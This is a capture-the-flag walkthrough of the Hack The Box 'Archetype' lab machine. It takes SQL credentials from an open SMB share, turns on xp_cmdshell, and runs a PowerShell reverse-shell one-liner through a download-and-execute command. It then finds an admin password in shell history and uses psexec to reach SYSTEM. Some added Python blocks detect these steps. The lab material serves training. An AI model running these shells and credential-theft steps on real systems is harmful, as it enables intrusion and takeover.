Archetype Walkthrough

Here I will begin with the "Starting Point" path. Basically it's a series of 9 easy-rated machines that should be rooted in sequence.

HTB provides official walkthroughs for each of the 9 machines. I think they are very helpful for noobs to understand the platform, the techniques and more about HTB. And when it comes to noobs, no one is here to find zero-day vulnerabilities. So from my perspective, it's fine to read each and every walkthrough provided by HTB and others to understand things by yourself. "Walkthroughs are the teachers".

Enough talks 🥱, let's start to hack. 🐱‍💻

Disclaimer: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

00. Start Machine …

To start the machine, just click "Join Machine".

Then you can see the IP address for that machine. Usually it is 10.10.10.27 🤠

Before going to the enumeration steps we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes machines may drop ping requests at the firewall, but in most cases ping will succeed!

root in ~/Documents/HackThebox/Archetype
⚡❯ ping 10.10.10.27 -c 2
PING 10.10.10.27 (10.10.10.27) 56(84) bytes of data.
64 bytes from 10.10.10.27: icmp_seq=1 ttl=127 time=252 ms
64 bytes from 10.10.10.27: icmp_seq=2 ttl=127 time=251 ms

--- 10.10.10.27 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 250.934/251.550/252.167/0.616 ms

01. Enumeration First …

01.1 Fast ports scan

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
-n	: Never do DNS resolution
-vv	: Extra verbosity
--open	: Show only open ports
-p-	: Full TCP port range (1-65535)
-T4	: Aggressive (4) timing template; assumes you are on a reasonably fast and reliable network

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2 
⚡❯ nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 19:15 +0530
Initiating Ping Scan at 19:15
Scanning 10.10.10.27 [4 ports]
Completed Ping Scan at 19:15, 0.27s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:15
Scanning 10.10.10.27 [65535 ports]
Discovered open port 139/tcp on 10.10.10.27
Discovered open port 445/tcp on 10.10.10.27
Discovered open port 135/tcp on 10.10.10.27
Discovered open port 49669/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 7.87% done; ETC: 19:21 (0:06:03 remaining)
SYN Stealth Scan Timing: About 8.21% done; ETC: 19:27 (0:11:22 remaining)
Discovered open port 5985/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 42.06% done; ETC: 19:18 (0:02:05 remaining)
Discovered open port 47001/tcp on 10.10.10.27
Discovered open port 49666/tcp on 10.10.10.27
SYN Stealth Scan Timing: About 64.67% done; ETC: 19:18 (0:01:06 remaining)
Discovered open port 49667/tcp on 10.10.10.27
Discovered open port 1433/tcp on 10.10.10.27
Discovered open port 49665/tcp on 10.10.10.27
Discovered open port 49664/tcp on 10.10.10.27
Discovered open port 49668/tcp on 10.10.10.27
Completed SYN Stealth Scan at 19:17, 172.44s elapsed (65535 total ports)
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
Scanned at 2021-04-15 19:15:06 +0530 for 173s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 127
139/tcp   open  netbios-ssn  syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
1433/tcp  open  ms-sql-s     syn-ack ttl 127
5985/tcp  open  wsman        syn-ack ttl 127
47001/tcp open  winrm        syn-ack ttl 127
49664/tcp open  unknown      syn-ack ttl 127
49665/tcp open  unknown      syn-ack ttl 127
49666/tcp open  unknown      syn-ack ttl 127
49667/tcp open  unknown      syn-ack ttl 127
49668/tcp open  unknown      syn-ack ttl 127
49669/tcp open  unknown      syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 172.86 seconds
           Raw packets sent: 102404 (4.506MB) | Rcvd: 93270 (3.731MB)

I have a small bash trick to collect all open ports into a bash variable called "ports". It will be useful later. 😎

ports=$(grep '^[0-9]' AllPorts.nmap | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

Yes, we can simply combine those two lines (the scan and the extraction) into one. But I need to see the results quickly, which is why I split it into two parts. If you want it in one line, you can use

ports=$(nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2  took 2m52s
⚡❯ more AllPorts.nmap
# Nmap 7.91 scan initiated Thu Apr 15 19:15:06 2021 as: nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
Scanned at 2021-04-15 19:15:06 +0530 for 173s
Not shown: 65523 closed ports
Reason: 65523 resets
PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 127 * (Interesting)
139/tcp   open  netbios-ssn  syn-ack ttl 127 * (Interesting)
445/tcp   open  microsoft-ds syn-ack ttl 127 * (Interesting)
1433/tcp  open  ms-sql-s     syn-ack ttl 127 * (Interesting)
5985/tcp  open  wsman        syn-ack ttl 127 * (Interesting)
47001/tcp open  winrm        syn-ack ttl 127 * (Interesting)
49664/tcp open  unknown      syn-ack ttl 127
49665/tcp open  unknown      syn-ack ttl 127
49666/tcp open  unknown      syn-ack ttl 127
49667/tcp open  unknown      syn-ack ttl 127
49668/tcp open  unknown      syn-ack ttl 127
49669/tcp open  unknown      syn-ack ttl 127

Here we can see some * (Interesting) ports; the others can be ignored for now.
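As an added example (not from the original post), here is a small parser that does what the bash pipeline above does but also checks the STATE column, so it stays correct on scans run without --open. The nmap text it parses is a constructed excerpt in the shape of AllPorts.nmap, not the author's real file.

```python
import re

# Constructed excerpt of an nmap -oN file in the same shape as the page's
# AllPorts.nmap (an extra filtered port is included to exercise the state check).
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.91 scan initiated Thu Apr 15 19:15:06 2021 as: nmap -n -vv -T4 -p- -oN AllPorts.nmap 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up, received echo-reply ttl 127 (0.67s latency).
PORT      STATE    SERVICE      REASON
135/tcp   open     msrpc        syn-ack ttl 127
139/tcp   open     netbios-ssn  syn-ack ttl 127
445/tcp   open     microsoft-ds syn-ack ttl 127
1433/tcp  open     ms-sql-s     syn-ack ttl 127
5985/tcp  open     wsman        syn-ack ttl 127
8080/tcp  filtered http-proxy   no-response
49664/tcp open     unknown      syn-ack ttl 127
"""

# One port line of normal (-oN) output: "<port>/<proto>  <state>  <service> ...".
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(text):
    """Return (port, proto, state, service) tuples for every port line in the file."""
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            found.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return found


def open_port_arg(text, proto="tcp"):
    """Build the comma-separated value for nmap -p from the open ports only.

    The page's grep '^[0-9]' keeps every port line regardless of state, which is
    only safe because the scan used --open; filtering on the state column keeps
    the list correct for scans run without it.
    """
    ports = sorted(p for p, pr, state, _ in parse_ports(text)
                   if pr == proto and state == "open")
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    print(open_port_arg(SAMPLE_NMAP_OUTPUT))
```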

01.2 Run Nmap Scripting Engine

To get the best result we can run the Nmap Scripting Engine against all open ports. Now that we know all the open ports, we can target just those and run the script engine as fast as possible.

nmap -sV -sC -oN DetailPorts.nmap -p$ports 10.10.10.27 
-sV	: Service fingerprinting
-sC	: Launch default NSE nmap scripts

In most cases this will end up in an error because of the $ports variable. This is not the right time to fix it, so if you get any error, run the command without the $ports variable and specify the ports by hand.

nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,1433 10.10.10.27 

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nmap -sV -sC -oN DetailPorts.nmap -p 135,139,455,1433 10.10.10.27
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 19:38 +0530
Nmap scan report for 10.10.10.27
Host is up (0.52s latency).

PORT     STATE  SERVICE        VERSION
135/tcp  open   msrpc          Microsoft Windows RPC
139/tcp  open   netbios-ssn    Microsoft Windows netbios-ssn
455/tcp  closed creativepartnr
1433/tcp open   ms-sql-s       Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-04-15T14:30:06
|_Not valid after:  2051-04-15T14:30:06
|_ssl-date: 2021-04-15T14:30:34+00:00; +21m39s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 21m39s, deviation: 0s, median: 21m38s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.24 seconds

Now we know the OS is Windows (Microsoft SQL Server 2017 RTM) and it has MSSQL (1433) open alongside SMB (139/445). Note that 445 was mistyped as 455 in the command above, so it shows as closed there; the full port scan already showed 445 open. Let's enumerate further. Remember, enumeration is the key! 🔑

01.3 List all available shares

So here it has the SMB port (445) open. I used smbclient to list all the available shares as an anonymous user.

sudo smbclient -N -L 10.10.10.27
-N	: Don't ask for a password
-L	: Get a list of shares available on a host

Here is output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ sudo smbclient -N -L 10.10.10.27

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Here we got something very interesting, right? There is only a single non-default share, 'backups', and it is accessible with no password, so let's access it and see what's inside. 😎😋

smbclient -N \\\\10.10.10.27\\backups\\

Now we are in the SMB shell and there is a file called 'prod.dtsConfig', so let's download it.

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ smbclient -N \\\\10.10.10.27\\backups\\
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 20 17:50:57 2020
  ..                                  D        0  Mon Jan 20 17:50:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 17:53:02 2020

                10328063 blocks of size 4096. 8203982 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \>

dir	: List the files and directories in the current share
get <file-name>	: Download a file

Now we can open the prod.dtsConfig file, and yeah, it contains a SQL connection string with credentials for the local Windows user ARCHETYPE\sql_svc 🥂.

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2  took 5m55s
⚡❯ more prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

02. Let's get a Foothold !!

Now that we have credentials, let's try connecting to the SQL Server using Impacket's mssqlclient.py.

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

source : https://github.com/SecureAuthCorp/impacket

02.1 Download and use mssqlclient.py

First we simply wget the mssqlclient.py script.

 wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py

Then run the script and check whether we are working as a sysadmin (privileged user) or not.

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

Now we can use the IS_SRVROLEMEMBER function to check whether the current SQL user has sysadmin (highest level) privileges on the SQL Server.

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')


-----------

          1

SQL>

According to the return value (1 = the login is a member of the role), yes, we have the highest privileges. 😁 This will allow us to enable xp_cmdshell and gain RCE on the host.

Check the awesome blog posts below to understand that trick.

02.2 Usage of xp_cmdshell

To enable xp_cmdshell, type the commands below.

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
reconfigure;
xp_cmdshell "whoami"

The whoami output confirms that the SQL Server service is also running in the context of the user ARCHETYPE\sql_svc.

SQL> xp_cmdshell "whoami"
output

--------------------------------------------------------------------------------

archetype\sql_svc

NULL

Now we can run system commands using xp_cmdshell. However, why not get a proper shell? 🤠
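From the defender's side, the sequence above leaves two host-side traces worth alerting on: the sp_configure change is written to the SQL Server ERRORLOG, and every xp_cmdshell command runs as cmd.exe spawned by sqlservr.exe. The following detection logic is an added example (not from the original post); the ERRORLOG lines and process records it runs over are constructed in the shape of the real ones, with made-up timestamps and spids.

```python
import re

# Constructed SQL Server ERRORLOG lines (timestamp, spid, message); the message
# text is the engine's real wording, the timestamps and spid are made up.
SAMPLE_ERRORLOG = """\
2021-04-15 19:40:01.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-04-15 19:40:01.20 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-04-15 19:41:30.00 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+)\s+Configuration option '(?P<option>[^']+)' "
    r"changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enabling (0 -> 1) hands the database engine a path to run OS code.
WATCHED_OPTIONS = {"xp_cmdshell", "ole automation procedures", "clr enabled"}


def config_change_alerts(log_text):
    """Return one alert per ERRORLOG line that turns a watched option on."""
    alerts = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option = m.group("option").lower()
        if option in WATCHED_OPTIONS and m.group("old") == "0" and m.group("new") == "1":
            alerts.append({"time": m.group("ts"), "spid": m.group("spid"), "option": option})
    return alerts


# Constructed process-creation records (parent image, child image, command line),
# the fields a Sysmon Event 1 or Security 4688 record would carry.
SAMPLE_PROCESSES = [
    ("sqlservr.exe", "cmd.exe", 'cmd.exe /c "whoami"'),
    ("sqlservr.exe", "cmd.exe", 'cmd.exe /c "powershell -noprofile"'),
    ("explorer.exe", "cmd.exe", "cmd.exe"),
]


def sql_spawned_shells(records):
    """Flag shells spawned directly by the SQL Server service process.

    xp_cmdshell runs each command as cmd.exe /c under sqlservr.exe, so this
    parent-child pair is the most reliable host-side signal; the command line
    is kept for triage.
    """
    return [(child, cmdline) for parent, child, cmdline in records
            if parent.lower() == "sqlservr.exe" and child.lower() in {"cmd.exe", "powershell.exe"}]
```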

Hmmmmah !! what a nice smell for powershell reverse-shell huh! 😍

You can get some idea about reverse shells from the links below,

But personally, I like to use Nishang's Invoke-PowerShellTcpOneLine.ps1 to create my rev-shell.

After deleting all comments and unwanted things, the powershell script will look like this. 👇

$client = New-Object System.Net.Sockets.TCPClient('YourIP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('YourIP',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Remember: run ifconfig tun0 and replace YourIP with your tun0 address.

02.3 Get Reverse Shell

Now it's time to get a reverse shell. Save the above powershell script as anyname.ps1 (here I use script.ps1) and power up a mini webserver. I'm a very lazy man, you know 🙄, so here I use updog instead of typing long shit in python 😑

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use HTTP basic auth.

source : https://github.com/sc0tfree/updog

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ updog
[+] Serving /root/Documents/HackThebox/Archetype...
 * Running on http://0.0.0.0:9090/ (Press CTRL+C to quit)

To listen for the connection, I always use the Swiss army knife (netcat). Personally I do not like to get a shell through multi/handler (metasploit). Trust me, using netcat you can learn a lot of things beyond metasploit. 👽

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ nc -lvnp 4444
 listening on [any] 4444 ... 

03. Exploit the target …

Now we can issue the command to download and execute the reverse shell through xp_cmdshell.

EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.39:9090/script.ps1") | powershell -noprofile'

I divided my terminal into 3 panes using the tmux multiplexer.

Woooh!!! We got our shell. 💀 A shell is received as sql_svc, and we can get user.txt on their desktop.

04. Privilege Escalation …

To escalate privileges we can run different tools. But before running any tool, there are some manual enumeration steps you should take first. I will be showing them one by one in each walkthrough.

Remember, we are now in a service account called sql_svc. It's good practice to check recently accessed files and executed commands (keep this in mind as a habit). By default the PowerShell console history is saved in C:\Users\<account_name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. Now you understand what our next step is.

Right, let's check the above file using the type command.

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Here is the output 👇

PS C:\Users\Administrator> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
PS C:\Users\Administrator>
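Both hops on this box come from a credential sitting in plain text: the connection string in prod.dtsConfig and the net use line in ConsoleHost_history.txt above. As an added example (not from the original post), here is a scanner that flags both artifact types and reports them with the secret redacted; the two samples are constructed in the shape of the page's files, with placeholder passwords rather than the machine's values.

```python
import re
import xml.etree.ElementTree as ET

# Constructed samples shaped like the two artifacts on this page; the secrets are
# placeholders, not the machine's real values.
SAMPLE_DTSCONFIG = """<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=example-pass;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

SAMPLE_HISTORY = """net.exe use T: \\\\Archetype\\backups /user:administrator example-adm1n
Get-ChildItem C:\\backups
exit
"""

# Connection-string keys that carry a secret, and the "/user:<name> <password>"
# shape of net use (a following switch or "*" means no inline password).
SECRET_KEYS = {"password", "pwd"}
NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?/user:(\S+)\s+(?![/*])(\S+)", re.IGNORECASE)


def dtsconfig_findings(xml_text):
    """Flag every ConfiguredValue connection string that embeds a password.

    Returns (path, user, redacted_connection_string); the secret never leaves here.
    """
    findings = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        value = conf.findtext("ConfiguredValue") or ""
        pairs = {}
        for part in value.split(";"):
            if "=" in part:
                k, v = part.split("=", 1)
                pairs[k.strip().lower()] = v.strip()
        if any(k in pairs for k in SECRET_KEYS):
            redacted = ";".join(f"{k}={'***' if k in SECRET_KEYS else v}" for k, v in pairs.items())
            findings.append((conf.get("Path"), pairs.get("user id"), redacted))
    return findings


def history_findings(history_text):
    """Flag shell-history lines that pass a password to net use on the command line."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        m = NET_USE.search(line)
        if m:
            findings.append((lineno, m.group(1), line.replace(m.group(2), "***")))
    return findings
```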

Oh no no no noooo.. You see?

The backup share is mapped with admin credentials. Remember this pattern if you see something like it: get ready to launch Impacket's psexec.py script.

python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27

Here is the output 👇

root in ~/Documents/HackThebox/Archetype 🐍 v3.9.2
⚡❯ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file gZiCFMKg.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service FuWR on 10.10.10.27.....
[*] Starting service FuWR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Finally we have Administrator privileges. 👌 Now we can access the flag on the Administrator desktop.

Find me on @twitter
